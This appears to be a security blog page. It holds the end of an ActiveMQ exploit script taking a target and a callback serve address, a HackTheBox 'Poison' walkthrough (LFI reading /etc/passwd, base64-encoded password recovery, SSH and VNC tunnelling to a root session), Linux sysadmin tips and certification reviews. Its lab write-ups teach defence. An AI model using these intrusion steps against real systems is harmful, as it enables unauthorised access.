            return format(i, '04x')
        elif n == 8:
            return format(i, '08x')
        else:
            raise ValueError("n must be 4 or 8")
    
    
    if __name__ == "__main__":
        parser = argparse.ArgumentParser()
        parser.add_argument("-i", "--ip", help="ActiveMQ Server IP or Hostname", required=True)
        parser.add_argument("-p", "--port", type=int, default="61616", help="ActiveMQ Server Port, defaults to 61616", required=False)
        parser.add_argument("-si", "--srvip",  help="Serve IP", required=True)
        parser.add_argument("-sp", "--srvport", type=int, default=8080, help="Serve port, defaults to 8080", required=False)
        args = parser.parse_args()
        
        main(args.ip, args.port, args.srvip, args.srvport)
    

    Avoiding the Hack - Lessons learned

    So, what can we learn from this box? As is often the case we begin with some out-of-date software with a vulnerability - worse, one with a publicly available POC. What’s a bit different here is that the vulnerable software isn’t really designed to be user-facing - instead, it’s middleware, designed to do a job and likely in place to facilitate communication between other “value-producing” systems. It’s not uncommon for applications like this either to be missed or to sink lower on the patch priority list because:

    1. Middleware often does not directly produce value, which, in the eyes of management, often makes it a lower priority.
    2. Message queuing systems (for just one example) are not seen as (and often probably shouldn’t be) public-facing, which can give IT teams a false sense of security.
    3. IT teams are reluctant to update components with multiple points of integration - if you worry about an update messing up your stand-alone web server you worry a lot more about a system which interconnects 4 or 5 different applications!
    4. Sometimes, it’s not clear who is actually responsible for them!

    At the structural level, many of these issues can be solved (or at least managed) through good documentation and IT governance processes, whereas points like number 4, which tend to arise as a result of departmental (or team) siloing, can be countered through targeted steps such as appointing collaborative security champions, or by adopting more holistic approaches like DevSecOps. It’s tempting to say that “ActiveMQ shouldn’t be exposed to external users anyway” - and in many cases that’s probably true - however, in a real scenario it’s entirely possible that I’d be attacking this box not from “cold” but rather having already gained a foothold in an enterprise network. Truly, it’s dangerous to think of systems as “internal” or “external” in the first place - rather, to the greatest possible extent, all systems should be secured as if they were subject to external attack - because they might be.

    In terms of privilege escalation, this was an excellent lesson in the risks associated with sudo privileges and web servers - once upon a time, not that long ago, one of the common calls from security professionals was “stop running your server as root”, and this is why. Unfortunately, running the server as a different user and then giving that user sudo privileges isn’t much better! Keep in mind that this isn’t specifically an Nginx issue either - we could have performed the same attack using something like Apache.

    That’s all for this one, see you in the next!

  • Writeups

    Poison is an older machine, but one of the few BSD boxes on the HTB platform - I felt like giving something a bit different a go!

    Gaining user access

    As always we’ll add poison.htb to our /etc/hosts file and give it a quick ping:

    └──╼ $ping poison.htb
    PING poison.htb (10.129.6.248) 56(84) bytes of data.
    64 bytes from poison.htb (10.129.6.248): icmp_seq=1 ttl=63 time=20.6 ms
    64 bytes from poison.htb (10.129.6.248): icmp_seq=2 ttl=63 time=17.4 ms
    

    And let’s let nmap do its work:

    └──╼ $nmap poison.htb -sC -sV
    Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-03 09:21 GMT 
    Nmap scan report for poison.htb (10.129.6.248) 
    Host is up (0.017s latency). 
    Not shown: 998 closed tcp ports (conn-refused) 
    PORT  STATE SERVICE VERSION 
    22/tcp open  ssh   OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0) 
    | ssh-hostkey:  
    |  2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA) 
    |  256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA) 
    |_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519) 
    80/tcp open  http   Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32) 
    |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 
    |_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32 
    Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd 
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
    Nmap done: 1 IP address (1 host up) scanned in 14.19 seconds
    

    We have a webserver running, and ssh - a fairly typical nmap result. We can also confirm that this box is FreeBSD. Taking a look at the webserver, there’s a basic page for testing php scripts - sounds risky!

    Let’s give listfiles.php a go..

    It seems like the application is literally running the script we specify and returning the result, here we’ve got an array of files in the directory. That pwdbackup.txt sure does sound interesting. I wonder if the file is literally just being included by index.php - can we just feed the app pwdbackup.txt?

    Yes we can, and here it is:

    When viewing a text file in a browser we often get some formatting which is designed to be helpful, but can end up causing issues with unexpected spaces etc. This is also a bit hard to read, so we’ll use “view source” on the page to check out the raw text.

    This looks like base64 - the hint about 13 encoding runs is handy, but let’s first try it “as is” just in case…

    └──╼ $echo "m0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo=" | base64 -d 
    �L�
       �^UV��Q��֑��������ђ�ؑ�▒L�LU���Ԍ��U▒▒U\U�\�U�^T�ՕB���▒�Y[�U�]▒��\▒T���ՙ
    ���▒VU��Z�X��Ռ�Օ�Qѕ[���T�LR]��Q�▒������^XQ��Q������Ւ������U���▒LV����ґVV�U���[��Q��]Ֆ����М���Ֆ�U���Q��֚�U�����U�Ӎ▒֚��Q�֑���R�U��▒T�U�֑�������QTZ���Z��U��̓�U���
     ]U▒��U�T�Z�����▒�����
    VUV�Ռ                 TL�^��T����ԌT���]���
    ����▒���U����Ԓ▒�MZT�L����U�^۔�����[\�T��՛��
             V��U��TZ����������V�Z���֑����[\�X[T^�[Z����V��Ց��]��VL����U^T����������L\Q��V��֕�U��T[Q��L�]���Q���▒������┌
    
    
    

    No joy there, let’s use a bash one-liner to try 13 lots of base64 decoding instead.

    └──╼ $data=$(cat encoded); for i in $(seq 1 13); do data=$(echo $data | tr -d ' ' | base64 -d); done; echo $data 
    Charix!2#4%6&8(0
    

    That works, and we have the password - just in case, we’ll try to ssh as root, but this won’t work.
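    As an aside, the same repeated decoding is easy to express in Python - here’s a quick sketch which round-trips the recovered password through 13 encoding runs and back (the round count and password come from the steps above):

    ```python
    import base64

    def multi_b64_decode(data: bytes, rounds: int) -> bytes:
        """Apply base64 decoding `rounds` times, stripping whitespace each pass."""
        for _ in range(rounds):
            data = base64.b64decode(b"".join(data.split()))
        return data

    # Round-trip demo: encode the recovered password 13 times, then decode it back
    blob = b"Charix!2#4%6&8(0"
    for _ in range(13):
        blob = base64.b64encode(blob)

    print(multi_b64_decode(blob, 13).decode())  # Charix!2#4%6&8(0
    ```

    Stripping whitespace between rounds mirrors the `tr -d ' '` in the bash one-liner, which deals with any line wrapping in the original file.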

    Let’s go back to the app…

    We’ve established that if we pass the name of a text file to it the data is simply included, so can we try an LFI?

    Yes, we can - grabbing /etc/passwd provides us with a user list.

    Note that again I’m using view source here to clean up the file and make it easy to read :)

    It makes sense that the charix password is probably for that user so we’ll give that a go!

    └──╼ $ssh charix@poison.htb 
    (charix@poison.htb) Password for charix@Poison: 
    Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4 
    FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017 
    
    Welcome to FreeBSD! 
    
    Release Notes, Errata: https://www.FreeBSD.org/releases/ 
    Security Advisories:  https://www.FreeBSD.org/security/ 
    FreeBSD Handbook:    https://www.FreeBSD.org/handbook/ 
    FreeBSD FAQ:      https://www.FreeBSD.org/faq/ 
    Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/ 
    FreeBSD Forums:     https://forums.FreeBSD.org/ 
    
    Documents installed with the system are in the /usr/local/share/doc/freebsd/ 
    directory, or can be installed later with:  pkg install en-freebsd-doc 
    For other languages, replace "en" with a language code like de or fr. 
    
    Show the version of FreeBSD installed:  freebsd-version ; uname -a 
    Please include that output and any error messages when posting questions. 
    Introduction to manual pages:  man man 
    FreeBSD directory layout:    man hier 
    
    Edit /etc/motd to change this login announcement. 
    To see how long it takes a command to run, type the word "time" before the 
    command name. 
             -- Dru <genesis@istar.ca> 
    charix@Poison:~ % 
    

    And we’re in. As a side note, when I was doing this box ssh was very slow to come back with a login prompt - give it a minute, it will get there.

    Escalation to root

    Within charix’s home directory we find a “secret.zip” - we’ll start with this since it seems like the obvious way forward. First, let’s get it onto our attack box. There’s no python3 on this box, but thankfully we do have Python 2, and I can just about remember how to start the server module!

    charix@Poison:~ % python -m SimpleHTTPServer 9000 
    Serving HTTP on 0.0.0.0 port 9000 ... 
    10.10.14.24 - - [03/Feb/2024 10:32:49] "GET /secret.zip HTTP/1.1" 200 -
    

    Back on my machine…

    wget poison.htb:9000/secret.zip 
    --2024-02-03 09:32:49--  http://poison.htb:9000/secret.zip 
    Resolving poison.htb (poison.htb)... 10.129.6.248 
    Connecting to poison.htb (poison.htb)|10.129.6.248|:9000... connected. 
    HTTP request sent, awaiting response... 200 OK 
    Length: 166 [application/zip] 
    Saving to: ‘secret.zip’ 
    
    secret.zip                   100%[====================================================================================================>]   166  --.-KB/s   in 0s    
    
    2024-02-03 09:32:49 (9.04 MB/s) - ‘secret.zip’ saved [166/166]
    
    
    

    The zip file is password protected - we could try to crack it, but charix has kindly reused their password so we can easily gain access with what we already have.

    └──╼ $unzip secret.zip 
    Archive:  secret.zip
    [secret.zip] secret password: 
     extracting: secret  
    

    The ZIP contains a single binary file - we’ll need to find something to use it for…

    Back to the target box then, and by far the most difficult aspect for me is working out how to use commands on FreeBSD - it’s similar enough that I basically know my way around, but most of the flags are different! After some clumsy enumeration and finally figuring out how to use netstat on this system, we can see there are a few services listening on localhost.

    charix@Poison:~ % netstat -an -p tcp 
    Active Internet connections (including servers) 
    Proto Recv-Q Send-Q Local Address      Foreign Address     (state) 
    tcp4    0    0 10.129.6.248.22     10.10.14.24.59344    ESTABLISHED 
    tcp4    0    0 127.0.0.1.25      *.*           LISTEN 
    tcp4    0    0 *.80          *.*           LISTEN 
    tcp6    0    0 *.80          *.*           LISTEN 
    tcp4    0    0 *.22          *.*           LISTEN 
    tcp6    0    0 *.22          *.*           LISTEN 
    tcp4    0    0 127.0.0.1.5801     *.*           LISTEN 
    tcp4    0    0 127.0.0.1.5901     *.*           LISTEN 
    charix@Poison:~ % 
    

    5801 and 5901 are both VNC ports, which are used for remote desktop access. If we have VNC running locally, can we forward it to our box using ssh?

    Thankfully ps works normally in BSD land, so let’s quickly check which user the process is running as:

    charix@Poison:~ % ps -aux | grep vnc 
    root  614  0.0  1.0  25724  9680 v0- I   09:36   0:00.10 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 1200 
    charix 983  0.0  0.0   412  328  2  R+  10:55   0:00.00 grep vnc
    

    Root! Well, that’s promising - VNC can use a binary password file for authentication, and it’s a safe bet that’s what the secret file from the zip is. Let’s give this a go…

    I have my proxychains socks5 proxy configured on port 5000, so firstly we’ll need to set up the ssh port forward, and then in a new terminal tab we can use proxychains to connect to VNC.

    [ProxyList] 
    # add proxy here ... 
    # meanwile 
    # defaults set to "tor" 
    socks5  127.0.0.1 5000 
    #socks5  127.0.0.1 5001
    
    ssh charix@poison.htb -D 5000
    
    proxychains vncviewer 127.0.0.1:5901 -passwd secret
    

    And indeed, this works a charm - up pops my VNC viewer, root session and all.

    Success, we owned the box!

    Alternative path

    I ran out of time for this after completing the box, but after checking out a few other writeups I can see that it was also possible to gain a shell on the box using a log poisoning attack (I guess this was the intended route, since the box is called poison!). You can try that approach yourself if you like :)

    Avoiding the Hack - Lessons learned

    So what can we learn from this box (other than the fact flags are weird in BSD)? Firstly, we have a publicly exposed testing application - this might seem like a contrived situation for HackTheBox, but in fact this is surprisingly common. The fix is simple - any system which is going into a production state for any reason should be thoroughly validated against a pre-determined baseline: if a port, service, or application isn’t on the approved list, it shouldn’t be on a production instance. At the very least, regular system scanning should pick up on issues like these, but it’s far preferable to properly validate before deployment!

    The application itself suffers from an LFI vulnerability, which again isn’t all that surprising for a test application. Avoiding an LFI issue can be achieved by implementing strict input validation mechanisms to sanitise user inputs, and better yet by avoiding user inputs in file paths whenever possible. If you have to use file inclusion, it’s a good idea to whitelist files, specifying allowed directories and files instead of using dynamic user-supplied input directly. On the system itself, enforcing proper access controls and least privilege principles - ensuring that the web server or application has the minimum required permissions to access files and directories - can help to prevent critical or sensitive files from being disclosed. Both SELinux and AppArmor are a good way to achieve this kind of coverage without having to implement it manually.
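    The app on this box is PHP, but the whitelist idea is language-agnostic - here’s a minimal sketch in Python (the function and file names are illustrative, not from the box):

    ```python
    from pathlib import Path

    def safe_include(base: Path, filename: str, allowed: set) -> str:
        """Return the contents of `filename` only if it is on the allow-list
        and resolves to a location inside the web root."""
        if filename not in allowed:
            raise ValueError("file not permitted")
        target = (base / filename).resolve()
        # Defence in depth: even an allow-listed name must resolve to a path
        # directly under the web root, defeating ../ and symlink tricks
        if base.resolve() not in target.parents:
            raise ValueError("path escapes web root")
        return target.read_text()
    ```

    With this approach, something like ../../etc/passwd fails the allow-list check immediately, and the resolve() check catches traversal even if a bad entry ever slips onto the list.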

    Within the password backup file, it’s clear to see that 13 iterations of base64 encoding isn’t truly any sort of protection - certainly, without the hint it would have taken longer to work out; however, whichever way you look at it, encoding is never more than obfuscation, and security by obscurity is never enough to rely on alone!

    As is often the case, there’s password reuse on the zip file within the charix user’s home directory - this is another issue which is much more common than you might think. Users are often concerned about losing access to data if they forget a password, but there are better ways to manage this than re-using your system password. All this really means is that if an attacker is able to compromise your account, they can also access your “password-protected” files. Keep in mind too that this works the other way around - if you send out a password-protected zip file which is subsequently cracked, there’s a reasonable chance that the password for the zip file is also a user account password!

    Finally, the VNC application running as root is an issue - as a rule, any interactive services shouldn’t run as root if at all possible. Of all the vulnerabilities on this machine, this one is the most likely to have a genuine reason to exist. Nonetheless, there’s almost always a better way to approach a problem than leaving an interactive process running as root.

    See you in the next one! :)

Stuff I've learned

Latest Tips ( all )

  • Tips

    I recently ran into another interesting “bug” (I sure do seem to find a lot of them) although this one, to be fair, is more of a quirk than an actual error.

    As I often seem to need to do at the moment, I was spinning up a new Ubuntu instance in VirtualBox. VirtualBox v7 has a fancy new feature called “Unattended Installation” which I hadn’t previously either noticed or had cause to use. I thought I’d give it a try and found that it did, indeed, set my system up using the credentials that it asked me for, and even installed the Guest Tools. What’s not to love?

    Well, how about the fact that on booting I’m not root and have no idea of the root password. No problem - let’s sudo su… and no, password prompt. sudo -s? No, password prompt. sudo [the command I wanted to run] - password prompt. Shoot. I’ve no idea what the root password is. It turns out that VirtualBox 7’s “Unattended Installation” does not put your initial userid into the sudo group - instead, it sets the root (uid=0) password to the same password as the initial id (uid=1000).

    The solution is therefore to run su - and use the password you specified when kicking off the installation. Then add your user to sudoers with usermod -a -G sudo [username].

    This is a really weird way of going about this - VirtualBox, if you’re reading - Love the unattended installation option, don’t love this setup!

  • Tips

    After upgrading an Ubuntu machine to 23.10, I ran into an interesting error - although the upgrade was successful, the system in question still seemed to think it was running the previous version of Ubuntu. Running lsb_release gives me the following, still showing the old version from which I just upgraded:

    duck@server:~$ lsb_release -a
    No LSB modules are available.
    Distributor ID: Ubuntu
    Description:    Ubuntu 23.04
    Release:        23.04
    Codename:       lunar
    

    I was not able to find a solid explanation as to exactly why this happened! My best guess is that one or more of the base files were modified (by me) and therefore were not updated during the upgrade. The solution was to reinstall the base-files package, which contains /etc/lsb-release:

    duck@server:~$ sudo apt reinstall base-files
    Reading package lists... Done
    Building dependency tree... Done
    Reading state information... Done
    The following package was automatically installed and is no longer required:
      wmdocker
    Use 'sudo apt autoremove' to remove it.
    The following packages will be upgraded:
      base-files
    1 upgraded, 0 newly installed, 0 to remove and 5 not upgraded.
    Need to get 73.8 kB of archives.
    After this operation, 26.6 kB of additional disk space will be used.
    Get:1 http://im.archive.ubuntu.com/ubuntu mantic-updates/main amd64 base-files amd64 13ubuntu2.1 [73.8 kB]
    Fetched 73.8 kB in 1s (92.4 kB/s)   
    (Reading database ... 199351 files and directories currently installed.)
    Preparing to unpack .../base-files_13ubuntu2.1_amd64.deb ...
    Unpacking base-files (13ubuntu2.1) over (12.3ubuntu2.1) ...
    Setting up base-files (13ubuntu2.1) ...
    Installing new version of config file /etc/debian_version ...
    Installing new version of config file /etc/issue.net ...
    motd-news.service is a disabled or a static unit not running, not starting it.
    Processing triggers for plymouth-theme-ubuntu-text (22.02.122-3ubuntu2) ...
    update-initramfs: deferring update (trigger activated)
    Processing triggers for install-info (7.0.3-2) ...
    Processing triggers for man-db (2.11.2-3) ...
    Processing triggers for initramfs-tools (0.142ubuntu15.1) ...
    update-initramfs: Generating /boot/initrd.img-6.5.0-14-generic
    
    
    

    Now, uname -a and lsb_release -a both display correctly.

    duck@server:~$ uname -a
    Linux server 6.5.0-14-generic #14-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 14 14:59:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
    
    duck@server:~$ lsb_release -a
    No LSB modules are available.
    Distributor ID: Ubuntu
    Description:    Ubuntu 23.10
    Release:        23.10
    Codename:       mantic
    

    Hopefully, this helps someone!

  • Tips

    As a part of creating training material, or perhaps making a vulnerable machine for a CTF, I often need to enable MySQL root access with a password - often a poor password which you should never use in a production environment! Doing this on Ubuntu has become a bit more tricky (although really that’s a good thing) but it’s also something I need to do often enough that I forget the correct way to do it on an up-to-date system!

    By default Ubuntu does not configure the MySQL root account to authenticate with a password - rather, you access a new installation by running either sudo mysql or spawning a root shell and just running mysql. Incidentally, this approach also breaks the mysql_secure_installation script, which is worth running for a production environment as it does pretty much what it says on the tin! Once you’ve accessed the root account, the ‘normal’ approach most people take to changing the password (and this is the error I usually make) is to run:

    ALTER USER 'root'@'localhost' IDENTIFIED BY 'password';
    

    And while this command will work, it won’t give you access on Ubuntu, since you also need to allow the root user to access mysql via password - therefore, we need to run:

    sudo mysql
    

    Then the following ALTER USER command to change the password and set the root user’s authentication method to one that uses a password. The following example changes the authentication method to mysql_native_password:

    ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';
    

    After making this change, exit the MySQL prompt:

    exit
    

    Following that, you can run the mysql_secure_installation script without any errors, or if you’re making a vulnerable / training system, you can now log in with

    mysql -u root -p
    

    If you’d like to revert to the default setting on Ubuntu (perhaps after running mysql_secure_installation) simply use the command:

    ALTER USER 'root'@'localhost' IDENTIFIED WITH auth_socket;
    
  • Tips

    If you’ve tried to install a Python package using pip install recently, and you’re running Debian 12 (or a derivative like Parrot 6 in my case) you may have been stumped by this error message:

    error: externally-managed-environment
    
    × This environment is externally managed
    ╰─> To install Python packages system-wide, try apt install
        python3-xyz, where xyz is the package you are trying to
        install.
    
        If you wish to install a non-Debian-packaged Python package,
        create a virtual environment using python3 -m venv path/to/venv.
        Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
        sure you have python3-full installed.
    
        If you wish to install a non-Debian packaged Python application,
        it may be easiest to use pipx install xyz, which will manage a
        virtual environment for you. Make sure you have pipx installed.
    
        See /usr/share/doc/python3.11/README.venv for more information.
    
    note: If you believe this is a mistake, please contact your Python installation or OS distribution provider. You can override this, at the risk of breaking your Python installation or OS, by passing --break-system-packages.
    hint: See PEP 668 for the detailed specification.
    

    What’s going on here? Essentially, the externally-managed-environment error occurs when the system package manager (apt, in this case) is managing Python packages; as a result, pip is not allowed (by default) to interfere with them. If we take a look at the Python enhancement proposal PEP 668 we can see that the objective of this change is essentially to prevent users from unintentionally modifying packages which are required by the distribution and breaking stuff. Actually, this is a pretty good idea - however, it can be a pain if you’d rather run the risk and continue to use pip with reckless abandon like I would.
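    Per PEP 668, the marker is simply a file named EXTERNALLY-MANAGED sitting in the interpreter’s stdlib directory, so you can check whether your environment is affected from Python itself - a small sketch:

    ```python
    import sysconfig
    from pathlib import Path

    # PEP 668: an environment is "externally managed" when this marker file
    # exists in the directory reported by sysconfig.get_path("stdlib")
    marker = Path(sysconfig.get_path("stdlib")) / "EXTERNALLY-MANAGED"

    if marker.exists():
        print(f"pip is blocked by {marker}")
    else:
        print("no marker - pip installs are allowed")
    ```

    This is also why deleting that file (as in option 2 below) removes the restriction: pip just checks for its presence.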

    It’s worth pointing out that if you’re managing a production system, you really should follow the advice given and try to install your required package using apt to get the version which is supported in your distro’s repository - simply run sudo apt install python3-[desired package]. Again, if you need a non-supported package, using a venv is the best way to go.

    If, however, you want to be reckless, you have two options..

    Option 1 - Break system packages

    The error message says you can pass in the flag --break-system-packages and you can do exactly that - this won’t deliberately break system packages, rather it’s just overriding the protection which has been introduced and doing what pip always used to do. It might break some system packages though - it kinda told you that :)

    If using a venv is more effort than you want to put in (pipx does make this quite easy!) a good halfway house would be to try getting the package from apt first, and then use --break-system-packages if the package isn’t present in the repo.

    Option 2 - Delete EXTERNALLY-MANAGED

    For a longer-term solution which will totally disable this message, you can delete the EXTERNALLY-MANAGED file in your system Python installation:

    sudo rm -rf /usr/lib/python3.11/EXTERNALLY-MANAGED
    

    This will totally disable the protection though, so use it with care. Python 3.11 is current as I’m writing this, but by the time you read it the path may differ based on the installed version.

Things that don't go in one of the other categories

Other Stuff ( all )

  • Other

    May 18, 2024 by Ducksec

    CompTIA SecurityX

    Last week I was invited by CompTIA to take the new SecurityX beta - so why not! I already have the CASP+, so this is a great opportunity to refresh knowledge and learn some new things - all for $50! The new eXpert series from CompTIA will eventually feature three exams: DataX, SecurityX and CloudNetX. According to CompTIA:

    CompTIA Advanced Security Practitioner (CASP+) is the expert version of CompTIA Security+ and will be re-branded to SecurityX, with the next exam version. This name change will not affect the status of current CASP+ certification holders and those with an active CASP+ certification will receive a SecurityX certification. The certification will continue to:

    • Validate job tasks performed by a security professional with 10 years of IT experience and 5 years of security experience
    • Be designed around the tasks performed by senior security engineer and security architect roles
    • Be a natural progression from the job roles aligned to Security+

    I’ll be updating this blog as I make better notes on the changes between the old and new syllabi, but for now let’s dive in with some initial impressions.

    So what’s changed?

    As usual there are some general updates to ensure the certification aligns with the newest approaches and tools, but there are also some larger shifts in the core areas of focus. My overall impression is that the SecurityX (CAS-005) specification places a stronger emphasis on proactive and advanced security measures which are more suitable for today’s hyper-connected environments, whilst adding some key new areas, such as AI security.

    For example, CompTIA have included objectives covering the adoption of zero trust architecture, cloud access security brokers (CASBs), and the integration of AI in security operations. An increased emphasis on automated security processes, including Security Orchestration, Automation, and Response (SOAR), and advanced cryptographic concepts like homomorphic encryption and post-quantum cryptography also suggests a shift towards more sophisticated and automated security frameworks.

    In some places, familiar topics have been somewhat deepened and modernised - the inclusion of topics like continuous integration/continuous deployment (CI/CD) and advanced application security testing reflects the growing importance of secure software development practices, and an expanded approach to risk management is evident in sections covering supply chain risk management, formal methods for software security, and the introduction of Software Bill of Materials (SBoM).

    Here’s a quick summary of what’s changed - if you’re planning to take the beta, hopefully this helps you to focus in on what you may need to put some extra study into!

    Quick summary of Changes between CASP+ (CAS-004) and SecurityX (CAS-005)

    Firstly, the certification Domains have been re-named and modified:

    CASP+ (CAS-004) Domains

    1. Security Architecture
    2. Security Operations
    3. Security Engineering
    4. Security Governance, Risk, and Compliance

    SecurityX (CAS-005) Domains

    1. Governance, Risk and Compliance
    2. Security Architecture
    3. Security Engineering
    4. Security Operations

    As you might expect there are some new topics in each section - for now, here’s a quick rundown of items which jumped out at me:

    New topics and areas of focus in SecurityX (CAS-005)

    1. Governance, Risk and Compliance
      • Supply Chain Risk Management
      • Updated GRC frameworks (DMA, COPPA etc.)
      • Focus on AI Security challenges
    2. Security Architecture
      • Zero Trust Architecture
      • Cloud Access Security Broker (CASB)
      • Integration of AI in Security
      • Software-Defined Networking (SDN)
      • Secure Access Service Edge (SASE)
      • Formal Methods for Software Security
      • Software Bill of Materials (SBoM)
      • Greater focus on APIs
    3. Security Engineering
      • Advanced Cryptographic Concepts
      • Specialised systems (IoT / OT)
      • Authenticated Encryption with Associated Data (AEAD)
      • TOML (Tom’s Obvious, Minimal Language)
      • Blockchain and Immutable Databases
      • Use of Post-Quantum Cryptography (PQC)
      • Virtualised technologies (eg vTPM)
    4. Security Operations
      • Greater focus on automation
      • RITA and Sigma (rule-based languages)
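
    A couple of these were completely new to me - TOML, for example, is a minimal configuration format that’s become increasingly common in tooling. As a quick illustration (my own sketch, not an exam item - the section and key names are made up), Python can now parse it with nothing but the standard library, from 3.11 onwards:

    ```python
    import tomllib  # standard library since Python 3.11

    # A hypothetical TOML fragment - named sections, typed values
    doc = """
    [server]
    host = "example.com"
    port = 8443
    tls = true
    """

    config = tomllib.loads(doc)
    print(config["server"]["port"])  # 8443 - parsed as an integer, not a string
    print(config["server"]["tls"])   # True - parsed as a boolean
    ```

    The point for exam purposes is just recognising the structure and the native typing - you won’t be writing TOML by hand.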

    I will update this post with more analysis as I start my studying!

  • Other

    Introduction

    Last year I enjoyed completing the AWS Solutions Architect Associate exam - so what better way to kick off 2024 than by taking on the Security specialism?!

    Certification Overview

    The AWS Certified Security - Specialty certification is a popular accreditation offered by Amazon Web Services (AWS) that, according to AWS “validates your expertise in creating and implementing security solutions in the AWS Cloud. This certification also validates understanding of specialised data classifications and AWS data protection mechanisms; data-encryption methods and AWS mechanisms to implement them; and secure internet protocols and AWS mechanisms to implement them.”.

    At the outset, it’s worth being clear that this is very much an AWS security certification - not a security certification with AWS as the focus. By this I mean that if you don’t already have a solid grounding in security principles don’t expect to master them by pursuing this certification, rather, take this certification to see how those principles apply in AWS specifically.

    AWS recommend that “AWS Certified Security - Specialty is intended for experienced individuals who have five years of IT security experience in designing and implementing security solutions and two or more years of hands-on experience in securing AWS workloads.” - my sense is that 5 years of security experience may be a bit overkill - the general security knowledge level required is probably on a par with Security+ - but the two years hands-on with AWS isn’t. While the certification certainly covers many of the familiar services you know and love, it does tend to focus on more unusual situations, edge cases and nuanced applications which you probably won’t be familiar with unless you’ve used the platform for a while.

    Exam Details

    • Exam Title: AWS Certified Security - Specialty

    • Exam Code: SCS-C02

    • Exam Format: Multiple-choice and multiple-response questions

    • Duration: 130 minutes

    • Passing Score: Approximately 750 (on a scale of 100-1000)

    Exam Domains

    According to the specification, the AWS Security Specialist certification exam is divided into the following key domains:

    • Domain 1: Threat Detection and Incident Response (14% of scored content)
    • Domain 2: Security Logging and Monitoring (18% of scored content)
    • Domain 3: Infrastructure Security (20% of scored content)
    • Domain 4: Identity and Access Management (16% of scored content)
    • Domain 5: Data Protection (18% of scored content)
    • Domain 6: Management and Security Governance (14% of scored content)

    Like my last AWS exam, I felt that this was an accurate representation of the actual question split on the exam - although Logging and Monitoring felt a bit heavier than 18% on my specific exam.

    Study Resources

    As I’ve mentioned in previous reviews, AWS does provide a good variety of resources to help you study for the exam - on top of this there are some excellent third-party providers offering some affordable and enjoyable training. Some key items to check out include:

    • AWS Official Documentation: I find reading through lots of documentation a bit challenging, but AWS’s training materials do a good job of signposting the most relevant ones to focus on. AWS offers extensive documentation on each service, architecture best practices, and whitepapers - I’d spend some time getting to know these for all the named security products on the exam. This is far from the most fun way to study, but many of the actual exam questions felt like they were lifted right from the documentation.
    • AWS Skill Builder: AWS provides a variety of useful resources, reasonably priced at $29 USD + tax per month - I’d recommend this for at least a single month.
    • Official Practice Questions: AWS offer a free official practice exam (20 questions), find it on the exam information page, or through Skill Builder.
    • Official Practice Exam - Available as part of the skill builder subscription, last time, for Solutions Architect Associate, I thought that the practice exam was a great representation of the actual test - this time, not quite so much!
    • Online Courses: Outside of AWS official resources there are plenty of courses available from platforms like Udemy, or subscription platforms like ITProTV or CBT Nuggets. Not on either of these platforms but well worth your time are the courses from Adrian Cantrill.
    • Labs: One of the best things about practising for an AWS exam was that labbing was very easy to do - simply create an AWS account and try things out. You’ll want to ensure you have cost management in place before labbing much for this exam as many of the security services can be quite expensive!

    Preparation Tips

